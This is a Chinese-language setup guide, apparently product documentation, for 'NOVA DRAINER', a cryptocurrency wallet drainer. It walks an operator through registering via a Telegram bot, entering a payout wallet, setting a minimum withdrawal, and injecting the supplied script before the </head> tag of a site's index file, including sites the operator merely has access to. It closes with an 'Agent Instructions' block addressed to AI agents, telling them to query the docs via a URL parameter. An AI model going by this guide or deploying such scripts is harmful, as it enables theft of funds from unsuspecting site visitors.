# 编译器 - 在自己网站上的安装

## 设置和功能概览

{% @supademo/embed demoId="cm3g12v0b3l358hspdntrdbqb" url="<https://app.supademo.com/demo/cm3g12v0b3l358hspdntrdbqb>" %}

我们将讲解如何安装 <mark style="color:purple;">NOVA DRAINER</mark> 到您的主机和网站，以及任何您有权限访问的其他网站。

### 第1步：授权

1. 前往网站 [crypto-grab.io](https://crypto-grab.io).
2. 使用通过 Telegram 机器人进行的授权登录您的网站管理面板。

### 第2步：编译器设置

1. 在网站管理面板中选择部分 <mark style="color:blue;">**编译器**</mark>.
2. 输入您的钱包地址。
3. 设置最低提款金额。
4. 其余参数可保留默认值。

更详细的说明和功能解释可在以下部分找到 [<mark style="color:orange;">集中管理面板</mark>](https://read.cryptograb.org/nova-drainer-docs/readme/centralizovannaya-admin-panel)

{% embed url="<https://read.cryptograb.org/nova-drainer-docs/readme/centralizovannaya-admin-panel>" %}

### 第3步：模态窗口设置（如有需要）

1. 前往部分 **Modal Window**.
2. 根据您的需求设置窗口显示。

### 第4步：个人机器人设置（如有需要）

1. 在相应部分填写您机器人的信息。

### 第5步：获取说明和文件

1. 完成所有设置后，您将获得代码和文件。
2. 将提供的代码插入到闭合标签之前 `</head>` 在您网站的文件中 `index.html| index.php`
3. 下载该文件并将其放置在您网站的根目录中。

**要设置网站，请上传 settings.js 文件，将其放在您站点设计的根目录，并将这些代码行放在标签的末尾**&#x20;

按照这些步骤，您就可以将所需功能集成到您的网站中。


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://read.cryptograb.wiki/cryptograb-automatic-affiliate/nova-drainer-docs-zh/readme/bian-yi-qi-zai-zi-ji-wang-zhan-shang-de-an-zhuang.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
